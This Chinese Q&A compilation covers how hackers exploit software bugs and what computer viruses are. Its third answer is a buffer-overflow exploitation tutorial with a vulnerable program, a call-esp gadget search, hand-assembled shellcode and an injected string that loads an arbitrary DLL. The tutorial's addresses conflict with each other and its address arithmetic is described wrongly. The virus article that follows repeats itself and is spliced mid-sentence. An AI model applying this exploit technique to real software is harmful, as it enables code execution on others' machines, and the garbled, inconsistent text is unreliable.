本文目录一览:
- 1、问一下。黑客是怎么利用程序漏洞的?
- 2、黑客如何利用信件或网页包含的程序代码来运行被黑电脑的某个程序或打开各种系统服务,并实施破坏?
- 3、如何利用缓冲区溢出的程序错误来运行黑客程序
- 4、是不是所有的计算机病毒都可以自我复制?考试遇到,不确定~
问一下。黑客是怎么利用程序漏洞的?
黑客。。绝大部分的人是直接利用别人写好的工具的。。。最典型的是以前的灰鸽子。。。
漏洞的找出。。。专业人员读程序代码。。。
一般IE浏览器的漏洞比较多。。像是迅雷 FLASHPLAYER 等典型的用的人多东西都会被人拿来研究。。。然后写工具利用..至于为什么写漏洞利用工具...总不能每次利用都一次一次的重复代码输入什么的吧。。。还有就是便于分享!
黑客如何利用信件或网页包含的程序代码来运行被黑电脑的某个程序或打开各种系统服务,并实施破坏?
让你点击一些JS或Web程序,利用服务端和客户端之间的协议作为保障,获得客户机的权限(可能是最高权限)。通过最高权限调用系统接口伪装正常程序进行破坏。
对服务器的攻击,有很多形式,比如注入数据库,负载量过大造成崩溃。让程序卸掉外壳,产生碎片。收集碎片和异常日志进行分析,编写程序,冒充正常的远程调用。
总之,无论是一般的客户机还是网站服务器,都是以获得权限为基础的。
如何利用缓冲区溢出的程序错误来运行黑客程序
上回说了,我们可以在一个有缓冲区溢出漏洞的程序中执行程序中其他的函数,当然,也可以执行程序中其他的指令。还是以上次讲过的程序为例:
程序A:
#include stdio.h
#include string.h
void foo(const char *input)
{
char buf[10];
strcpy(buf, input);
}
int main(int argc, char *argv[])
{
foo("1234567890123456123456123456");
return 0;
}
启动VS 2005,然后将断点设在函数foo中strcpy的后面,断点执行到了以后,进入反汇编窗口,单步执行到该函数最后一行汇编指令,也就是ret指令,在内存窗口中查看寄存器esp保存的内存地址所存放的值,当然你的内存窗口的显示方式应该是4字节显示方式(x86或者说是32位机器上)。你可以看到该值也已经被foo的参数12345678那些字符串覆盖了,然后你可以看看esp的值和ebp的值刚好相差8个字节。就是说,内存中的形式是这样的:
ebp的值 esp的值
^ ^
| |
--------------------------------------
| |函数返回地址| |
---------------------------------------
而你再看看foo函数最后几个汇编指令:非常标准的函数退出时,所作的栈销毁操作:
mov esp ebp
pop ebp
ret
在ret指令执行完成以后,esp的值就会是foo函数的ebp + 8。
如果我们在esp所指向的内存地址上存放我们的shell code(或者说是我们刻意编写的汇编代码),然后将函数返回地址更改为调用我们的shell code的地址,那么我们所编写的shell code也就会被执行,这时就可以干任何我们想干的事情了,;)。
下面是步骤:
1,编写一个dll,其实exe程序也可以,只不过方法略有不同,如果你是直接执行exe程序的话,可以使用WinExec。这里因为我要导入我编写的dll进入程序A,所以使用的WINAPI函数是LoadLibrary,LoadLibrary需要一个参数,指明要加载的dll的文件路径。
2. 在我编写的dll中,处理的事情很简单,就是启动一个程序,呵呵,下面是源代码:
#include
"stdafx.h"
#include stdio.h
#include windows.h
#ifdef _MANAGED
#pragma managed(push, off)
#endif
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( si,
sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( pi, sizeof(pi) );
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // 每次一个新的进程加载该dll的时候,触发这个条件
WinExec("C://WINDOWS//notepad.exe", SW_SHOW);
break;
default:
break;
}
return TRUE;
}
#ifdef
_MANAGED
#pragma managed(pop)
#endif
3.为了调用LoadLibrary,我们需要写一些汇编指令,因为cpu执行的是机器码,而不是汇编指令,所以你要将汇编指令转换为机器码。转换很简单,在你的代码里面加上下面这几行:
int main()
{
_asm {
jmp esp
}
}
将断点设置在main函数的开始处,执行程序,程序中断后,去反汇编,你会看到类似下面的代码:
00401763 FF E4 jmp esp
00401763是这段汇编码在程序中的地址,FF E4就是jmp esp对应的机器码了。呵呵,如果没有FF E4出现的话,在反汇编窗口中右键单击,选择“Show Byte Code”(VS 2005英文版)。
现在腰调用esp中的地址,可以是jmp esp也可以是call esp,但是这个代码必须是进程中已有的,OK,我们在程序中找到这个地址。再次运行程序A,在main函数中设置断点,中断后,选择Debug -- Window -- Module查看这个程序所有加载的dll(无论是动态的还是静态加载的)。程序A中不出意外的话应该有kernel32.dll和ntdll.dll,还有可能有msvcrt8.dll。
我们找一下这些dll里面有没有对应的机器码,怎么找?怎么把一个dll反汇编?呵呵,VS 2005里面自己就带了一个反汇编工具:dumpbin,路经在C:/Program Files/Microsoft Visual Studio 8/VC/bin。dumpbin有一个选项/disasm就是将任何一个PE文件(DLL或EXE)反汇编
打开cmd窗口,执行dumpbin /disasm c:/windows/system32/kernel32.dll | findstr /c:"FF E4",哦哦,没有。再试ntdll.dll,还是没有。试一下call esp,它的机器吗是FF E5。kernel32.dll里面没有,啊哈,ntdll.dll里面有,这是搜索结果:
7C914393: FF E5 call esp
4.编写shell code,调用LoadLibrary,需要知道LoadLibrary函数的地址,获取的办法是这样的:LoadLibrary是在kernel32.dll中的,启动Depends.exe,Depends.exe包含在Windows SDK中,你也可以去网上搜一下,下载一个回来用,实在找不到,那我就牺牲一下自己啦。
随便用depends打开一个exe文件,在左上角的依赖树里面点击kernel32.dll,在右边第二个窗口中找到LoadLibraryA这个函数,可以看到它的Entry Point是0x000445EF,如下:
E | Ordinal | Hint | Function | Entry Point
---------------------------------------------------------------------------------------------
754 (0x02F2) | 753 (0x02F1) | LoadLibraryA | 0x000445EF
操作系统不一样,值可能不一样,在最下面的窗口中找到kernel32.dll的base address(Preferred Base)是0x77E00000,如下:
Module | ... 中间很多省略 ... | Preferred Base
-------------------------------------------------------------------------
Kernel32.dll | .... | 0x77E000000
将Kernel32.dll的Preferred Base和LoadLibraryA的Entry Point按位于就获得LoadLibraryA在你的程序中的地址是:0x77E445EF。
5。最后编写汇编代码执行你的黑客程序:
_asm {
mov eax 0x77E445EF // 将LoadLibraryA的地址存在eax寄存器中
call L4
L2: call eax // 调用LoadLibraryA,程序执行到这段指令时LoadLibraryA的参数已经压栈
L3: jmp L3 // 循环,确保被黑的程序不会死掉
L4: call L2
}
6。最后,示例程序如下:
#include
stdio.h
#include string.h
void func(char *p)
{
char stack_temp[20];
strcpy(stack_temp, p);
printf(stack_temp);
}
void foo()
{
printf("This should not be called");
}
int main(int argc, char *argv[])
{
func("I AM MORE THAN TWENTLONG/x93/x43/x91/x7C"
"/xB8/x77/x1D/x80/x7C" // mov eax 0x771D807C LoadLibraryA的地址
"/xEB/x04" // call L4
"/xFF/xD0" // L2: call eax
"/xEB/xFE" // L3: jmp L3
"/xE8/xF7/xFF/xFF/xFF" // L4: call L2
"c://hack.dll/0"); // LoadLibraryA的参数,也就是我们要刻意加载的dll文件
return 0;
}
完了,累死了
是不是所有的计算机病毒都可以自我复制?考试遇到,不确定~
电脑病毒是一种在用户不知情或批淮下, 能自我复制及执行 计算机病毒是一种在用户不知情或批淮下,能自我复制及运行的计算机程序;计算机病毒往往会影响受感染的计算机的正常运作。
法律定义
此条目仅具一部分地域的观点或资料,尚需补充世界性的内容。
欢迎改善本文,或讨论本文任何问题。
病毒的定义一直存在着争议[1],不少人包括世界各国的反病毒厂商都将基于网络的木马、后门程序以及恶意软件也归在电脑病毒之列查杀。
以下内容是中国大陆的电脑病毒的法律定义,司法部门凭这个就可以逮捕病毒制作和散播者。
1994年2月18日《中华人民共和国计算机信息系统安全保护条例》第二十八条[2]
计算机病毒,是指编制或者在计算机程序中插入的“破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码”。
截止2007年12月,中国仍然沿用此条例,没有新的修订。
中国互联网协会关于恶意软件的定义[3]
恶意软件是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵犯用户合法权益的软件,但已被我国现有法律法规规定的计算机病毒除外。
[编辑] 病毒作者
参见:被捕黑客列表
有不少病毒制作者黑客们被逮捕并予以起诉,判决的轻重各国都有所不同,如罗马尼亚西欧班尼花费15分钟写的MSBlast.F变种大约只感染了1000台计算机,按他们国家的法律他就有可能最高会被判15年有期徒刑,而1998年台湾病毒作者陈盈豪写的CIH病毒被一些人认为“迄今为止危害最大的病毒”[4],使全球6000万台计算机瘫痪,但他因为在被逮捕后无人起诉而免于法律制裁,在2001年有人以CIH受害者的身份起诉陈盈豪,才使他再次被逮捕,按照台湾当时的法律,他会被判损毁罪面临最高只3年以下的有期徒刑。
中国的木马程序“证券大盗”作者张勇因使用其木马程序截获股民账户密码,盗卖股票价值1141.9万元,非法获利38.6万元人民币,被逮捕后以盗窃罪与金融犯罪起诉,最终的判决结果是无期徒刑。
一公司的分析报告称,目前全世界现有200万有能力写较成熟电脑病毒的程序员。[5]
[编辑] 历史
主条目:知名病毒及蠕虫的历史年表
“病毒”一词最早用来表达此意是在弗雷德·科恩(Fred Cohen)1984年的论文《电脑病毒实验》。而病毒一词广为人知是得力于科幻小说。一部是1970年代中期大卫·杰洛德(David Gerrold)的《When H.A.R.L.I.E. was One》,描述了一个叫“病毒”的程序和与之对战的叫“抗体”的程序;另一部是约翰·布鲁勒尔(John Brunner)1975年的小说《震荡波骑士(ShakewaveRider)》,描述了一个叫做“磁带蠕虫”、在网络上删除数据的程序。[6]
1960年代初,美国麻省理工学院的一些青年研究人员,在做完工作后,利用业务时间玩一种他们自己创造的计算机游戏。做法是某个人编制一段小程序,然后输入到计算机中运行,并销毁对方的游戏程序。而这也可能就是计算机病毒的雏形。
[编辑] 运行环境以及传播途径
由于世界操作系统桌面环境90%的市场都由是使用微软Windows系列产品[7] ,所以病毒作者纷纷把病毒攻击对象选为Windows。制作病毒者首先应该确定要攻击的操作系统版本有何漏洞,这才是他所写的病毒能够利用的关键,而Windows没有行之有效的固有安全功能,且用户常以管理员权限运行未经安全检查的软件,这也为Windows下病毒的泛滥提供了温床。对于Linux、Mac OS等操作系统,使用的人群比较少,病毒一般不容易扩散。大多病毒发布作者的目的有多种,包括恶作剧、想搞破坏、报复及想出名与对研究病毒有特殊嗜好。
病毒主要通过网络浏览以及下载,盗版CD或DVD以及可移动磁盘等途径迅速传播。[8]
[编辑] 命名
以下表格所示是国际上对病毒命名惯例的前缀释义,DOS下的病毒一般无前缀:
前缀 含义
WM Word6.0、Word95宏病毒
WM97 Word97宏病毒
XM Excel5.0、Excel95宏病毒
X97M Excel5.0和Excel97版本下发作
XF Excel程序病毒
AM Access95宏病毒
AM97M Access97宏病毒
W95 Windows95、98病毒
Win Windows3.x病毒
W32 32位病毒,感染所有32位Windows系统
WINT 32位Windows病毒,只感染Windows NT
Trojan/Troj 特洛伊木马
VBS VBScript程序语言编写的病毒
VSM 感染 Visio VBA(Visual Basic for Applications)宏或script的宏或script病毒
JS JScript编程语言编写的病毒
PE 32位寻址的Windows病毒
OSX Mac OSX的病毒
中间部分指的是病毒的英文名,而后缀一般是变种代号。
[编辑] 特征
在计算机科学里,电脑病毒是类似生物病毒一样的程序,它会复制自己并传播到其他宿主,并对宿主造成损害。宿主也是程序,通常是操作系统,从而进一步传染到其他程序、其他的电脑。电脑病毒在传播期间一般会隐蔽自己,由特定的条件触发,并开始产生破坏。
电脑病毒具有的不良特征有传播性、隐蔽性、感染性、潜伏性、可激发性[9]、表现性或破坏性,通常表现两种以上所述的特征就可以认定该程序是病毒。
计算机病毒的生命周期为开发期—传染期—潜伏期—发作期—发现期—消化期—消亡期。[8][10]
[编辑] 主要特征详解
[编辑] 传播性
病毒一般会自动利用25电子邮件端口传播,利用对象为微软操作系统捆绑的Outlook的某个漏洞。将病毒自动复制并群发给存储的通讯录名单成员。邮件标题较为吸引人点击,大多利用社会工程学如“我爱你”这样家人朋友之间亲密的话语,以降低人的警戒性。如果病毒制作者再应用脚本漏洞,将病毒直接嵌入邮件中,那么用户一点邮件标题打开邮件就会中病毒。
[编辑] 隐蔽性
最大的病毒不过1MB,一般的病毒仅在1KB左右,这样除了传播快速之外,隐蔽性也极强。部分病毒使用“无进程”技术或插入到某个系统必要的关键进程当中(工计算机病毒是一种在用户不知情或批淮下,能自我复制及运行的计算机程序;计算机病毒往往会影响受感染的计算机的正常运作。
法律定义
此条目仅具一部分地域的观点或资料,尚需补充世界性的内容。
欢迎改善本文,或讨论本文任何问题。
病毒的定义一直存在着争议[1],不少人包括世界各国的反病毒厂商都将基于网络的木马、后门程序以及恶意软件也归在电脑病毒之列查杀。
以下内容是中国大陆的电脑病毒的法律定义,司法部门凭这个就可以逮捕病毒制作和散播者。
1994年2月18日《中华人民共和国计算机信息系统安全保护条例》第二十八条[2]
计算机病毒,是指编制或者在计算机程序中插入的“破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码”。
截止2007年12月,中国仍然沿用此条例,没有新的修订。
中国互联网协会关于恶意软件的定义[3]
恶意软件是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵犯用户合法权益的软件,但已被我国现有法律法规规定的计算机病毒除外。
[编辑] 病毒作者
参见:被捕黑客列表
有不少病毒制作者黑客们被逮捕并予以起诉,判决的轻重各国都有所不同,如罗马尼亚西欧班尼花费15分钟写的MSBlast.F变种大约只感染了1000台计算机,按他们国家的法律他就有可能最高会被判15年有期徒刑,而1998年台湾病毒作者陈盈豪写的CIH病毒被一些人认为“迄今为止危害最大的病毒”[4],使全球6000万台计算机瘫痪,但他因为在被逮捕后无人起诉而免于法律制裁,在2001年有人以CIH受害者的身份起诉陈盈豪,才使他再次被逮捕,按照台湾当时的法律,他会被判损毁罪面临最高只3年以下的有期徒刑。
中国的木马程序“证券大盗”作者张勇因使用其木马程序截获股民账户密码,盗卖股票价值1141.9万元,非法获利38.6万元人民币,被逮捕后以盗窃罪与金融犯罪起诉,最终的判决结果是无期徒刑。
一公司的分析报告称,目前全世界现有200万有能力写较成熟电脑病毒的程序员。[5]
[编辑] 历史
主条目:知名病毒及蠕虫的历史年表
“病毒”一词最早用来表达此意是在弗雷德·科恩(Fred Cohen)1984年的论文《电脑病毒实验》。而病毒一词广为人知是得力于科幻小说。一部是1970年代中期大卫·杰洛德(David Gerrold)的《When H.A.R.L.I.E. was One》,描述了一个叫“病毒”的程序和与之对战的叫“抗体”的程序;另一部是约翰·布鲁勒尔(John Brunner)1975年的小说《震荡波骑士(ShakewaveRider)》,描述了一个叫做“磁带蠕虫”、在网络上删除数据的程序。[6]
1960年代初,美国麻省理工学院的一些青年研究人员,在做完工作后,利用业务时间玩一种他们自己创造的计算机游戏。做法是某个人编制一段小程序,然后输入到计算机中运行,并销毁对方的游戏程序。而这也可能就是计算机病毒的雏形。
[编辑] 运行环境以及传播途径
由于世界操作系统桌面环境90%的市场都由是使用微软Windows系列产品[7] ,所以病毒作者纷纷把病毒攻击对象选为Windows。制作病毒者首先应该确定要攻击的操作系统版本有何漏洞,这才是他所写的病毒能够利用的关键,而Windows没有行之有效的固有安全功能,且用户常以管理员权限运行未经安全检查的软件,这也为Windows下病毒的泛滥提供了温床。对于Linux、Mac OS等操作系统,使用的人群比较少,病毒一般不容易扩散。大多病毒发布作者的目的有多种,包括恶作剧、想搞破坏、报复及想出名与对研究病毒有特殊嗜好。
病毒主要通过网络浏览以及下载,盗版CD或DVD以及可移动磁盘等途径迅速传播。[8]
[编辑] 命名
以下表格所示是国际上对病毒命名惯例的前缀释义,DOS下的病毒一般无前缀:
前缀 含义
WM Word6.0、Word95宏病毒
WM97 Word97宏病毒
XM Excel5.0、Excel95宏病毒
X97M Excel5.0和Excel97版本下发作
XF Excel程序病毒
AM Access95宏病毒
AM97M Access97宏病毒
W95 Windows95、98病毒
Win Windows3.x病毒
W32 32位病毒,感染所有32位Windows系统
WINT 32位Windows病毒,只感染Windows NT
Trojan/Troj 特洛伊木马
VBS VBScript程序语言编写的病毒
VSM 感染 Visio VBA(Visual Basic for Applications)宏或script的宏或script病毒
JS JScript编程语言编写的病毒
PE 32位寻址的Windows病毒
OSX Mac OSX的病毒
中间部分指的是病毒的英文名,而后缀一般是变种代号。
[编辑] 特征
在计算机科学里,电脑病毒是类似生物病毒一样的程序,它会复制自己并传播到其他宿主,并对宿主造成损害。宿主也是程序,通常是操作系统,从而进一步传染到其他程序、其他的电脑。电脑病毒在传播期间一般会隐蔽自己,由特定的条件触发,并开始产生破坏。
电脑病毒具有的不良特征有传播性、隐蔽性、感染性、潜伏性、可激发性[9]、表现性或破坏性,通常表现两种以上所述的特征就可以认定该程序是病毒。
计算机病毒的生命周期为开发期—传染期—潜伏期—发作期—发现期—消化期—消亡期。[8][10]
[编辑] 主要特征详解
[编辑] 传播性
病毒一般会自动利用25电子邮件端口传播,利用对象为微软操作系统捆绑的Outlook的某个漏洞。将病毒自动复制并群发给存储的通讯录名单成员。邮件标题较为吸引人点击,大多利用社会工程学如“我爱你”这样家人朋友之间亲密的话语,以降低人的警戒性。如果病毒制作者再应用脚本漏洞,将病毒直接嵌入邮件中,那么用户一点邮件标题打开邮件就会中病毒。
[编辑] 隐蔽性
最大的病毒不过1MB,一般的病毒仅在1KB左右,这样除了传播快速之外,隐蔽性也极强。部分病毒使用“无进程”技术或插入到某个系统必要的关键进程当中(工作管理员中的处理程序内,无法关闭的就是了),所以在任务管理器中找不到它的单独运行进程。而病毒自身一旦运行后,就会自己修改自己的文件名并隐藏在某个用户不常去的系统文件夹中,这样的文件夹通常有上千个系统文件,如果凭手工查找很难找到病毒。而病毒在运行前的伪装技术也不得不值得我们关注,将病毒和一个吸引人的文件捆绑合并成一个文件,那么运行正常吸引他的文件时,病毒也在我们的操作系统中悄悄的运行了。作管理员中的处理程序内,无法关闭的就是了),所以在任务管理器中找不到它的单独运行进程。而病毒自身一旦运行后,就会自己修改自己的文件名并隐藏在某个用户不常去的系统文件夹中,这样的文件夹通常有上千个系统文件,如果凭手工查找很难找到病毒。而病毒在运行前的伪装技术也不得不值得我们关注,将病毒和一个吸引人的文件捆绑合并成一个文件,那么运行正常吸引他的文件时,病毒也在我们的操作系统中悄悄的运行了。